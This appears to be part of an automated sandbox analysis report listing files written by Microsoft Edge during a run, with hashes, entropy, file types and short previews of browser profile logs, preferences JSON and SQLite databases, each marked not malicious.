                                                                                                                                                                                                                                                                          SHA1:A67822C17670CCE0BA72D3E9C8DA0CE755A3421A
                                                                                                                                                                                                                                                                          SHA-256:5D599596D116802BAD422497CF68BE59EEB7A9135E3ED1C6BEACC48F73827161
                                                                                                                                                                                                                                                                          SHA-512:05C0D33516B2C1AB6928FB34957AD3E03CB0A8B7EEC0FD627DD263589655A16DEA79100B6CC29095C3660C95FD2AFB2E4DD023F0597BD586DD664769CABB67F8
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):349
                                                                                                                                                                                                                                                                          Entropy (8bit):5.098373109572272
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:6:iOrvbq2PCHhJ23oH+Tcwt7Uh2ghZIFUtJvBLJZmwPvBLDkwOCHhJ23oH+Tcwt7UT:7XvBYebIhHh2FUtx/J56YebIhHLJ
                                                                                                                                                                                                                                                                          MD5:3A5AB3E6EF562CFBCCBC0751E647A668
                                                                                                                                                                                                                                                                          SHA1:BD29CA560119C36B25EED32F1FEFD2A18053E695
                                                                                                                                                                                                                                                                          SHA-256:59B30F521440A77AF14F6686BA04A87211B8B7E6A6DE00B311FF752163283BA4
                                                                                                                                                                                                                                                                          SHA-512:D729BC6E24531953469EC3166FCEE4D6F2468E6EE9BA024D3D9B73F3EF18896F3CE9222DBAC6B08863DA02387F16438DB720584471A6BA15B6FAF81F1C35A809
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:2025/01/09-08:55:35.652 5e0 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/MANIFEST-000001.2025/01/09-08:55:35.653 5e0 Recovering log #3.2025/01/09-08:55:35.653 5e0 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/000003.log .
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):270336
                                                                                                                                                                                                                                                                          Entropy (8bit):0.0012471779557650352
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:3:MsEllllkEthXllkl2zE:/M/xT02z
                                                                                                                                                                                                                                                                          MD5:F50F89A0A91564D0B8A211F8921AA7DE
                                                                                                                                                                                                                                                                          SHA1:112403A17DD69D5B9018B8CEDE023CB3B54EAB7D
                                                                                                                                                                                                                                                                          SHA-256:B1E963D702392FB7224786E7D56D43973E9B9EFD1B89C17814D7C558FFC0CDEC
                                                                                                                                                                                                                                                                          SHA-512:BF8CDA48CF1EC4E73F0DD1D4FA5562AF1836120214EDB74957430CD3E4A2783E801FA3F4ED2AFB375257CAEED4ABE958265237D6E0AACF35A9EDE7A2E8898D58
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):434
                                                                                                                                                                                                                                                                          Entropy (8bit):5.266510442109748
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:12:7sz+vBYebvqBQFUtqvm/YeV56YebvqBvJ:7FBYebvZgoY6Yebvk
                                                                                                                                                                                                                                                                          MD5:481BA8207D4CD7F56B2A4BA4F35FC323
                                                                                                                                                                                                                                                                          SHA1:E1DF178F5486F9F96DF184314D71A9C8ED651D5D
                                                                                                                                                                                                                                                                          SHA-256:0CDE3E5F1D64EB99897838DA811FE4662D935575950738423CBB51400A3479E1
                                                                                                                                                                                                                                                                          SHA-512:C1ADCFDB86D073C0E17E5F7851337B2C2F195B8E95FA762750AB57D211240D858A0F664B3359CC779274D218DD27EE30CA9A22E462A511C00A50B47658356E87
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:2025/01/09-08:55:36.411 164c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/MANIFEST-000001.2025/01/09-08:55:36.412 164c Recovering log #3.2025/01/09-08:55:36.416 164c Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/000003.log .
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):2
                                                                                                                                                                                                                                                                          Entropy (8bit):1.0
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:3:H:H
                                                                                                                                                                                                                                                                          MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                          SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                          SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                          SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:[]
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):40
                                                                                                                                                                                                                                                                          Entropy (8bit):4.1275671571169275
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:3:Y2ktGMxkAXWMSN:Y2xFMSN
                                                                                                                                                                                                                                                                          MD5:20D4B8FA017A12A108C87F540836E250
                                                                                                                                                                                                                                                                          SHA1:1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
                                                                                                                                                                                                                                                                          SHA-256:6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
                                                                                                                                                                                                                                                                          SHA-512:507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:{"SDCH":{"dictionaries":{},"version":2}}
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 9, cookie 0x7, schema 4, UTF-8, version-valid-for 4
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):36864
                                                                                                                                                                                                                                                                          Entropy (8bit):0.3886039372934488
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:24:TLqEeWOT/kIAoDJ84l5lDlnDMlRlyKDtM6UwccWfp15fBIe:T2EeWOT/nDtX5nDOvyKDhU1cSB
                                                                                                                                                                                                                                                                          MD5:DEA619BA33775B1BAEEC7B32110CB3BD
                                                                                                                                                                                                                                                                          SHA1:949B8246021D004B2E772742D34B2FC8863E1AAA
                                                                                                                                                                                                                                                                          SHA-256:3669D76771207A121594B439280A67E3A6B1CBAE8CE67A42C8312D33BA18854B
                                                                                                                                                                                                                                                                          SHA-512:7B9741E0339B30D73FACD4670A9898147BE62B8F063A59736AFDDC83D3F03B61349828F2AE88F682D42C177AE37E18349FD41654AEBA50DDF10CD6DC70FA5879
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):2
                                                                                                                                                                                                                                                                          Entropy (8bit):1.0
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:3:H:H
                                                                                                                                                                                                                                                                          MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                          SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                          SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                          SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:[]
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):80
                                                                                                                                                                                                                                                                          Entropy (8bit):3.4921535629071894
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:3:S8ltHlS+QUl1ASEGhTFljl:S85aEFljl
                                                                                                                                                                                                                                                                          MD5:69449520FD9C139C534E2970342C6BD8
                                                                                                                                                                                                                                                                          SHA1:230FE369A09DEF748F8CC23AD70FD19ED8D1B885
                                                                                                                                                                                                                                                                          SHA-256:3F2E9648DFDB2DDB8E9D607E8802FEF05AFA447E17733DD3FD6D933E7CA49277
                                                                                                                                                                                                                                                                          SHA-512:EA34C39AEA13B281A6067DE20AD0CDA84135E70C97DB3CDD59E25E6536B19F7781E5FC0CA4A11C3618D43FC3BD3FBC120DD5C1C47821A248B8AD351F9F4E6367
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:*...#................version.1..namespace-..&f.................&f...............
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):422
                                                                                                                                                                                                                                                                          Entropy (8bit):5.217858584310386
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:6:iOrvJa+q2PCHhJ23oH+TcwtzjqEKj0QMxIFUtJv28HZZmwPvIhd3VkwOCHhJ23oq:7FvBYebvqBZFUtLZ/ox56YebvqBaJ
                                                                                                                                                                                                                                                                          MD5:8DF9A1C9F444442D20FB159B2084FA1E
                                                                                                                                                                                                                                                                          SHA1:9973075FEECE23B5795461C551ECBE4A1025CB8E
                                                                                                                                                                                                                                                                          SHA-256:D2F54E43F54C6356D81B2BC7F1CAD860159229A68EB8F6C5AA8F50E0ACA87FBD
                                                                                                                                                                                                                                                                          SHA-512:0A61902EB465C8BBF44BBB9F5122BC6D641C4C8843C859A9B9D57C8D1060DF59F21E5E102ADE3E2CFC0749B7E849B0FA0D70C6140C87EB33F8DFA1D5B9366525
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:2025/01/09-08:55:55.959 1a08 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/MANIFEST-000001.2025/01/09-08:55:55.961 1a08 Recovering log #3.2025/01/09-08:55:55.966 1a08 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/000003.log .
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):325
                                                                                                                                                                                                                                                                          Entropy (8bit):5.204077137366633
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:6:iOrvSM+q2PCHhJ23oH+TcwtpIFUtJvFCEJZmwPvFCEcMVkwOCHhJ23oH+Tcwta/o:7z+vBYebmFUtuEJ/AE9V56YebaUJ
                                                                                                                                                                                                                                                                          MD5:4F81B11A0726E9D1AC4F79830C949738
                                                                                                                                                                                                                                                                          SHA1:3FF03127FFF7BF84B8C7D5D95A38D0DD30D74A87
                                                                                                                                                                                                                                                                          SHA-256:E2ABD5BAC22EDCB0174D9166DB15214B597D6EF8ECF59001C64C47487EC3FC27
                                                                                                                                                                                                                                                                          SHA-512:BC2AB029486E6CA153B1DF783FAB6E0CD6F8BEDBE6114B64B3A08BBCC758370BC619EDF767CF537EC715EF52C10E41F9B760F80A8961A2F92E32CC17DA4EE171
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:2025/01/09-08:55:35.650 eac Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/MANIFEST-000001.2025/01/09-08:55:35.661 eac Recovering log #3.2025/01/09-08:55:35.661 eac Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/000003.log .
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 9, database pages 91, cookie 0x36, schema 4, UTF-8, version-valid-for 9
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):196608
                                                                                                                                                                                                                                                                          Entropy (8bit):1.2650751425014164
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:384:KrJ/2qOB1nxCkMdSAELyKOMq+8QTQKC+CVumW:K0q+n0Jd9ELyKOMq+8Q7B
                                                                                                                                                                                                                                                                          MD5:4F6EBA892B9C1A8647991A6492FEDB3E
                                                                                                                                                                                                                                                                          SHA1:B12DD9A3045503C65F5795C409CFF76B3CEC8BE2
                                                                                                                                                                                                                                                                          SHA-256:3433C3EAF24A1B010684B707ADB5ABA38957BA421D5F991ECEC32C1E77FF1E65
                                                                                                                                                                                                                                                                          SHA-512:86DCC6F1EF1A9BD06F2C9C94A848956D4E70CF2A31B43DB43A818A01B42BA2D8BF82EDBC172FA5F7A4987E93F362F190052995C66A03CFC67D6730865BA3CF94
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:SQLite format 3......@ .......[...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 10, cookie 0x7, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):40960
                                                                                                                                                                                                                                                                          Entropy (8bit):0.46693415448219827
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:48:Tnj7dojKsKmjKZKAsjZNOjAhts3N8g1j3UcB0LrQ4c:v7doKsKuKZKlZNmu46yjx0LU4c
                                                                                                                                                                                                                                                                          MD5:A959B4D40E3A3BC458F5F63B751F3013
                                                                                                                                                                                                                                                                          SHA1:935EBC1A3786C41964E022C65A2D10F6E3BF0C46
                                                                                                                                                                                                                                                                          SHA-256:FF5F00EE89E2215A0AE6990109D459C5FEEDB852FCB907673A10EC78334FED48
                                                                                                                                                                                                                                                                          SHA-512:48BC3AF2C6AFC738E0F8670DA0F3227CF224C34D4C64EDBDB9F98801B92575E48A18A0EFC0225C0252EDFF4608D675E4978BA5A17B5722EE9EDA907E0C3D3B16
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):13612
                                                                                                                                                                                                                                                                          Entropy (8bit):5.239382828551976
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:192:stbJ99QTryDigabatSuypXskrXIa34HkgYYUQ1i8CbV+FCwQwd4Cbq7NIaPfYJ:stbPGKSu4XskrXXrbGJQwmCm7NIj
                                                                                                                                                                                                                                                                          MD5:F73F00C757A5C884BC03C2E263C3F174
                                                                                                                                                                                                                                                                          SHA1:BD943C6EB9312EA3A3D32E098F73E61A639FD349
                                                                                                                                                                                                                                                                          SHA-256:F6FFF2EB599E8A043A7DE7799BFABE05B72A4BDD25A028B534430EE012C6FB34
                                                                                                                                                                                                                                                                          SHA-512:D4D643C7AAC62BB31C8903F405982A66695A100A4CE248729A5955484521EF370ADE2A009FD3FBCD0FC1DD17F8411812D62F58662E9CD0C1E03D3C81D2846140
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13380904536315242","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340968290017037","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"2caf0cf4-ea42-4083-b928-29b39da1182b":{"last_path":""},"2cb2db96-3bd0-403e-abe2-9269b3761041":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (3951), with CRLF line terminators
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):11755
                                                                                                                                                                                                                                                                          Entropy (8bit):5.190465908239046
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:192:hH4vrmqRBB4W4PoiUDNaxvR5FCHFcoaSbqGEDI:hH4vrmUB6W4jR3GaSbqGEDI
                                                                                                                                                                                                                                                                          MD5:07301A857C41B5854E6F84CA00B81EA0
                                                                                                                                                                                                                                                                          SHA1:7441FC1018508FF4F3DBAA139A21634C08ED979C
                                                                                                                                                                                                                                                                          SHA-256:2343C541E095E1D5F202E8D2A0807113E69E1969AF8E15E3644C51DB0BF33FBF
                                                                                                                                                                                                                                                                          SHA-512:00ADE38E9D2F07C64648202F1D5F18A2DFB2781C0517EAEBCD567D8A77DBB7CB40A58B7C7D4EC03336A63A20D2E11DD64448F020C6FF72F06CA870AA2B4765E0
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:{.. "DefaultCohort": {.. "21f3388b-c2a5-4791-8f6e-a4cad6d17f4f.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.BingHomePage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Covid.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Finance.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Jobs.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.KnowledgeCard.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Local.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.NTP3PCLICK.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.NotifySearchPage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Recipe.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.SearchPage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Sports.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Travel.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Weather.Bubble": 1,.. "2cb2db96-3bd0-403e-abe2-9269b3761041.Bubble": 1,.
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):40504
                                                                                                                                                                                                                                                                          Entropy (8bit):5.56129862483325
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:768:0Znyku7pLGLhOkWPxhfbF8F1+UoAYDCx9Tuqh0VfUC9xbog/OV88apJv+rwc9oQq:0ZnykuchOkWPxhfbFu1jaJ8aLvbUoQwz
                                                                                                                                                                                                                                                                          MD5:F4B5BA538F619CB0F921CAC647F54D98
                                                                                                                                                                                                                                                                          SHA1:15C3F547123AB58F13F67324832606105AB70334
                                                                                                                                                                                                                                                                          SHA-256:A8274EC3B21EE962030A67F21BDA5A0A053607F08FDCD15C5B75D98223AA4B73
                                                                                                                                                                                                                                                                          SHA-512:FEB80E741BD4D7A9032A1556ACBBCE763AFD3FFEFA542670DBF786386C540D660783E6F757FED33D11713CAC60B820FEBFACCD6EA2E964135E7717F89AC3B28C
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13380904535643113","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13380904535643113","location":5,"ma
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):37149
                                                                                                                                                                                                                                                                          Entropy (8bit):5.564363640164279
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:768:0ZnyHkWPxhfkF8F1+UoAYDCx9Tuqh0VfUC9xbog/OV88apJv+rwc9oWR6ZmqKpQw:0ZnyHkWPxhfkFu1jaJ8aLvbUoWR65Rt6
                                                                                                                                                                                                                                                                          MD5:4AFAA8BA13143DA296EC368EFACC7946
                                                                                                                                                                                                                                                                          SHA1:D7D83AA46EF28CEDEB6D1AE4B39BE1C7E6606ADE
                                                                                                                                                                                                                                                                          SHA-256:211AA666C0922D78462908651D04F9E18B45357FCC060B1C11EC38E72184E923
                                                                                                                                                                                                                                                                          SHA-512:A06B17E49E15FA7B4E015FF39BC6E1415467D7D57A8DB404415C0BFE1707BE14F534C3CBA6DD9BEB8D2E72E34562278816672C22F434EF2ECCAC2A6E9A2EE031
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13380904535643113","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13380904535643113","location":5,"ma
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 7, cookie 0x4, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):28672
                                                                                                                                                                                                                                                                          Entropy (8bit):0.3410017321959524
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:12:TLiqi/nGb0EiDFIlTSFbyrKZb9YwFOqAyl+FxOUwa5qgufTJpbZ75fOSG:TLiMNiD+lZk/Fj+6UwccNp15fBG
                                                                                                                                                                                                                                                                          MD5:98643AF1CA5C0FE03CE8C687189CE56B
                                                                                                                                                                                                                                                                          SHA1:ECADBA79A364D72354C658FD6EA3D5CF938F686B
                                                                                                                                                                                                                                                                          SHA-256:4DC3BF7A36AB5DA80C0995FAF61ED0F96C4DE572F2D6FF9F120F9BC44B69E444
                                                                                                                                                                                                                                                                          SHA-512:68B69FCE8EF5AB1DDA2994BA4DB111136BD441BC3EFC0251F57DC20A3095B8420669E646E2347EAB7BAF30CACA4BCF74BD88E049378D8DE57DE72E4B8A5FF74B
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:Unicode text, UTF-8 text, with very long lines (17582), with no line terminators
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):17592
                                                                                                                                                                                                                                                                          Entropy (8bit):5.494593586299019
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:384:stbPGKSu4XskrXXYk+qULDmJkT1bGJQwmp7f7NIj:sJOxuQ7FmbGaZQ
                                                                                                                                                                                                                                                                          MD5:A250BD24AA9D8652C7D0EFF74EAF4376
                                                                                                                                                                                                                                                                          SHA1:FD850E89313EE49A04CE22DBFD4315AE8566345B
                                                                                                                                                                                                                                                                          SHA-256:881397AD6AE53C8F519D16B457FBB2FB3CF1E7C9081AF8F7C3311EE3B4A8C0E1
                                                                                                                                                                                                                                                                          SHA-512:026227C0E5C3B7ACA076E26CD1BE9FBE7A77EE0380EC2C9650BE41447F9F9B5CB289D95B3B8CA3359792272D2655731A908A62C72695F16D4C04A2DC1D070CF9
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13380904536315242","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340968290017037","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"2caf0cf4-ea42-4083-b928-29b39da1182b":{"last_path":""},"2cb2db96-3bd0-403e-abe2-9269b3761041":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):32768
                                                                                                                                                                                                                                                                          Entropy (8bit):0.10213855977213164
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:12:+1ppgic1ppgiJDspEjVl/PnnnnnnnnnnnvoQ/Eou:+6YoPnnnnnnnnnnnv1j
